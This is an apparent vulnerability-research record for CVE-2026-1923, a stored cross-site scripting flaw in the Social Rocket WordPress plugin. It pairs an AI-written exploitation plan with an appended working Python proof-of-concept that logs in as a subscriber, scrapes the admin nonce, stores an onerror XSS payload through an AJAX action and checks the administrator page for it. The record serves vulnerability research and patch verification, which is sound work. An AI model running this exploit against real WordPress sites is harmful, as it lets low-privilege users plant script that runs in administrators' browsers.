[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f-qflVmJpzZdXYX5hiaCxSYEzwkXmjl685IR5RDLOTYo":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":33},"CVE-2026-1923","social-rocket-social-sharing-plugin-authenticated-subscriber-stored-cross-site-scripting-via-id","Social Rocket – Social Sharing Plugin \u003C= 1.3.4.2 - Authenticated (Subscriber+) Stored Cross-Site Scripting via id","The Social Rocket – Social Sharing Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘id’ parameter in all versions up to, and including, 1.3.4.2 due to insufficient input sanitization and output escaping. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","social-rocket",null,"\u003C=1.3.4.2","1.3.5","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-22 12:47:30","2026-04-23 01:24:32",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd92fc04e-201e-4fc3-bbf0-4f2f3de3ee95?source=api-prod",1,[22,23,24,25],"admin\u002Fincludes\u002Fclass-social-rocket-admin.php","admin\u002Fjs\u002Fadmin.js","readme.txt","social-rocket.php","researched",false,3,"This research plan outlines the steps to demonstrate a Stored Cross-Site Scripting (XSS) vulnerability in the Social Rocket plugin (\u003C= 1.3.4.2). The vulnerability allows a Subscriber-level user to inject malicious scripts via the `id` parameter in a settings-save AJAX action, which then executes when an administrator views the Click to Tweet settings page.\n\n### 1. Vulnerability Summary\n*   **ID**: CVE-2026-1923\n*   **Vulnerability**: Authenticated Stored XSS\n*   **Vulnerable Parameter**: `id`\n*   **Affected Endpoint**: `wp-admin\u002Fadmin-ajax.php` via the `social_rocket_tweet_settings_save` action.\n*   **Cause**: The plugin registers AJAX handlers for managing \"Click to Tweet\" settings\u002Fstyles but fails to perform capability checks (like `current_user_can('manage_options')`). Additionally, it stores the `id` parameter with insufficient sanitization and later outputs it in the admin interface without proper escaping.\n\n### 2. 
Attack Vector Analysis\n*   **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action**: `social_rocket_tweet_settings_save`\n*   **Authentication**: Required (Subscriber or higher)\n*   **Payload Parameter**: `id`\n*   **Vulnerable Context**: The `id` is used as a key or identifier for custom Click to Tweet styles and is rendered in the admin dashboard (likely within the \"Click to Tweet\" settings tab).\n\n### 3. Code Flow\n1.  **Registration**: `Social_Rocket_Admin::__construct` (in `admin\u002Fincludes\u002Fclass-social-rocket-admin.php`) registers several AJAX actions, including `social_rocket_tweet_settings_save`.\n2.  **Access**: These actions are registered using `wp_ajax_`, making them accessible to any logged-in user.\n3.  **Lack of Authorization**: The handler function `tweet_settings_save` (and others like `tweet_settings_update`) likely verifies a nonce but lacks a `current_user_can` check.\n4.  **Storage**: The `id` parameter is received from `$_POST['id']` and saved into the WordPress options table (likely within an array under `social_rocket_settings` or `social_rocket_tweet_styles`).\n5.  **Sink**: When an administrator navigates to **Social Rocket > Click to Tweet**, the plugin retrieves the saved styles and iterates through them. The `id` is printed into the HTML (e.g., as part of a list or a data-attribute) without using `esc_attr()` or `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nThe plugin localizes a JavaScript object named `socialRocketAdmin` in the WordPress admin area. This object contains the necessary nonce.\n\n1.  **Preparation**: Since the plugin enqueues its admin scripts on all admin pages (including the user profile), a Subscriber can access it.\n2.  **Navigation**: Use the browser to log in as a Subscriber and navigate to `\u002Fwp-admin\u002Fprofile.php`.\n3.  
**Extraction**: Use `browser_eval` to extract the nonce from the `socialRocketAdmin` object.\n    *   **Variable Name**: `socialRocketAdmin`\n    *   **Nonce Key**: `nonce` (verifiable via `browser_eval(\"window.socialRocketAdmin\")`)\n    *   **Action String**: Not needed client-side. The action string passed to `wp_create_nonce()` stays in the plugin's PHP and is re-applied by `wp_verify_nonce()` \u002F `check_ajax_referer()` inside the handler; the request only has to carry the token value from the `nonce` key. The POST field name it must be sent in is not confirmed and should be read from the request built in `admin\u002Fjs\u002Fadmin.js`.\n\n### 5. Exploitation Strategy\n1.  **Login**: Authenticate as a Subscriber user.\n2.  **Nonce Extraction**:\n    *   Navigate to `\u002Fwp-admin\u002Fprofile.php`.\n    *   Execute: `NONCE = browser_eval(\"window.socialRocketAdmin.nonce\")`.\n3.  **Injection**: Send a POST request to `admin-ajax.php` to save a malicious \"tweet style\".\n    *   **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Method**: `POST`\n    *   **Content-Type**: `application\u002Fx-www-form-urlencoded`\n    *   **Body** (one field per line for readability; send it as a single line):\n        ```\n        action=social_rocket_tweet_settings_save\n        &nonce=[EXTRACTED_NONCE]\n        &id=style-\">\u003Cimg src=x onerror=alert(document.domain)>\n        &settings[tweet_text]=Test\n        &settings[tweet_username]=testuser\n        ```\n        On the wire the `id` value must be percent-encoded, i.e. `id=style-%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E`; PHP decodes it back to the raw payload before it is stored. The field names `nonce`, `id` and `settings[...]` are taken from this plan and are unverified; the request sent by `admin\u002Fjs\u002Fadmin.js` is the reference.\n4.  **Triggering**: Log in as an Administrator and navigate to the plugin settings:\n    *   **URL**: `\u002Fwp-admin\u002Fadmin.php?page=social_rocket_click_to_tweet`\n\n### 6. Test Data Setup\n*   **User**: A user with the `subscriber` role.\n*   **Plugin State**: Ensure Social Rocket is active. No existing \"Click to Tweet\" styles are required, as the exploit creates one.\n\n### 7. Expected Results\n*   The AJAX request should return a success response (likely `wp_send_json_success()` output, a JSON object with `success: true`). An HTTP 400 with body `0` means the action name is not registered; an HTTP 403 with body `-1` means the nonce check failed.\n*   The payload `style-\">\u003Cimg src=x onerror=alert(document.domain)>` will be stored in the database.\n*   When an administrator views the \"Click to Tweet\" settings page, an alert box showing the document domain will appear.\n\n### 8. Verification Steps\n1.  **Database Check**: Use WP-CLI to inspect the stored settings. The option name is not confirmed (section 3 names `social_rocket_settings` and `social_rocket_tweet_styles` as candidates), so list the plugin's options first and then dump the one holding the styles:\n    ```bash\n    wp option list --search='social_rocket*' --fields=option_name\n    wp option get \u003COPTION_NAME> --format=json\n    ```\n    Confirm that the `id` key in the settings array contains the malicious payload verbatim. If the stored value is already altered (tags stripped, quotes removed), the input side is sanitized and this sink is not reachable through `id`.\n2.  **HTML Inspection**: Use `http_request` as an administrator (the request must carry the administrator's logged-in cookies) to fetch the settings page and check for the unescaped payload:\n    ```bash\n    # Look for the raw payload in the response body; an esc_attr() sink would\n    # render it as &quot;&gt;&lt;img src=x onerror=... with no live onerror attribute\n    http_request(url=\"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=social_rocket_click_to_tweet\")\n    ```\n\n### 9. Alternative Approaches\n*   **Shortcode Context**: If the `id` is also echoed when the `[social_rocket_tweet id=\"...\"]` shortcode is used on the frontend, check if the injection triggers for any user viewing a post containing that shortcode.\n*   **`tweet_settings_update`**: If `save` is restricted, attempt the `social_rocket_tweet_settings_update` action, which likely follows the same vulnerable pattern.\n*   **Parameter Variation**: If the `id` parameter itself is escaped, check if keys inside the `settings` array (e.g., `settings[tweet_text]`) are also unescaped when rendered in the admin preview.","gemini-3-flash-preview","2026-04-27 13:46:35","2026-04-27 13:47:19",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","1.3.4.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-rocket\u002Ftags\u002F1.3.4.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsocial-rocket.1.3.4.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-rocket\u002Ftags\u002F1.3.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fsocial-rocket.1.3.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fsocial-rocket\u002Ftags"]
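The nonce extraction, injection and HTML check from sections 4, 5 and 8 of the research plan, carried out as one script. This is an added example, not code from the Social Rocket plugin or from the page's research output. Every plugin-specific name in it is an assumption taken from the unverified plan: the nonce living in `window.socialRocketAdmin.nonce`, the `social_rocket_tweet_settings_save` action, the `nonce` / `id` / `settings[...]` POST fields and the `page=social_rocket_click_to_tweet` admin page; confirm them against `admin/js/admin.js` before relying on the result. The `wp-login.php` form fields (`log`, `pwd`, `wp-submit`, `testcookie`) are standard WordPress. The sample HTML embedded in the script is constructed, not captured from a site, so the parsing and classification parts run offline; only `run()` touches the network.

```python
"""Sections 4, 5 and 8 of the research plan as a script (CVE-2026-1923).

Added example; not code from the plugin or from this page's research output.
Every endpoint and field name is an assumption taken from the unverified plan
(window.socialRocketAdmin.nonce, action social_rocket_tweet_settings_save,
POST fields nonce / id / settings[...], page=social_rocket_click_to_tweet)
and must be confirmed against admin/js/admin.js before use.
"""
import html
import http.cookiejar
import json
import re
import sys
import urllib.error
import urllib.request
from typing import Optional
from urllib.parse import urlencode

PAYLOAD_ID = 'style-"><img src=x onerror=alert(document.domain)>'
AJAX_ACTION = "social_rocket_tweet_settings_save"          # assumed, from the plan
SETTINGS_PAGE = "/wp-admin/admin.php?page=social_rocket_click_to_tweet"  # assumed

# wp_localize_script() emits exactly:  var <name> = <json>;
NONCE_RE = re.compile(r"var\s+socialRocketAdmin\s*=\s*(\{.*?\})\s*;", re.S)

# Constructed sample of that output (not captured from a real site).
SAMPLE_PROFILE_HTML = (
    "<script>\n"
    'var socialRocketAdmin = {"ajax_url":"http:\\/\\/localhost:8080\\/wp-admin\\/admin-ajax.php",'
    '"nonce":"7f3a9c1d2e"};\n'
    "</script>"
)
# Constructed samples of the sink rendered without and with esc_attr().
SAMPLE_UNESCAPED_HTML = '<li data-style-id="' + PAYLOAD_ID + '">Test</li>'
SAMPLE_ESCAPED_HTML = '<li data-style-id="' + html.escape(PAYLOAD_ID, quote=True) + '">Test</li>'


def extract_nonce(page_html: str) -> Optional[str]:
    """Nonce value from the localized object, or None if it is missing or garbled.

    Only the token value is needed: the action string given to wp_create_nonce()
    stays in the plugin's PHP and is re-applied by wp_verify_nonce() in the handler.
    """
    m = NONCE_RE.search(page_html)
    if not m:
        return None
    try:
        return json.loads(m.group(1)).get("nonce")
    except json.JSONDecodeError:
        return None


def build_body(nonce: str, style_id: str = PAYLOAD_ID) -> str:
    """Section 5 body as one x-www-form-urlencoded line; urlencode() percent-encodes
    the quote, angle brackets and spaces in the id, and PHP decodes them back."""
    return urlencode({
        "action": AJAX_ACTION,
        "nonce": nonce,                       # field name assumed, see admin.js
        "id": style_id,
        "settings[tweet_text]": "Test",
        "settings[tweet_username]": "testuser",
    })


def classify_sink(page_html: str, style_id: str = PAYLOAD_ID) -> str:
    """'unescaped' if the raw payload is in the page, 'escaped' if only its esc_attr()
    form (&quot;&gt;&lt;img ...) is, 'absent' otherwise. html.escape() matches esc_attr()
    for this payload; one containing a single quote would not (&#x27; vs &#039;)."""
    if style_id in page_html:
        return "unescaped"
    if html.escape(style_id, quote=True) in page_html:
        return "escaped"
    return "absent"


def _login(base: str, user: str, password: str):
    """Return an opener holding a logged-in WordPress session for this user."""
    opener = urllib.request.build_opener(
        urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar()))
    opener.open(base + "/wp-login.php").read()  # GET first so wordpress_test_cookie is set
    form = urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                      "redirect_to": base + "/wp-admin/", "testcookie": "1"}).encode()
    opener.open(base + "/wp-login.php", data=form).read()
    return opener


def run(base: str, sub: str, sub_pw: str, admin: str, admin_pw: str) -> str:
    """Steps 1-4 of section 5, then the section 8 HTML check; returns the sink class."""
    s = _login(base, sub, sub_pw)
    nonce = extract_nonce(s.open(base + "/wp-admin/profile.php").read().decode())
    if nonce is None:
        sys.exit("socialRocketAdmin.nonce not on profile.php; check where admin.js is enqueued")
    try:
        resp = s.open(base + "/wp-admin/admin-ajax.php", data=build_body(nonce).encode()).read()
    except urllib.error.HTTPError as e:
        resp = e.read()  # unknown action -> 400 and "0"; failed check_ajax_referer() -> 403 and "-1"
    print("ajax response:", resp[:200])
    a = _login(base, admin, admin_pw)
    return classify_sink(a.open(base + SETTINGS_PAGE).read().decode())


if __name__ == "__main__":
    if len(sys.argv) != 6:
        sys.exit("usage: poc.py http://localhost:8080 <subscriber> <password> <admin> <password>")
    print("sink:", run(*sys.argv[1:]))
```

Run it as `python3 poc.py http://localhost:8080 subscriber sub_pw admin admin_pw`. A result of `unescaped` reproduces the sink; `escaped` means the output side is already run through `esc_attr()`/`esc_html()` (the patched behaviour to expect on 1.3.5); `absent` means nothing was stored under that `id`, so check the printed AJAX response and the field names before concluding anything. The `0`/`-1` bodies the handler returns on an unknown action or a failed nonce check are WordPress core behaviour, not plugin-specific.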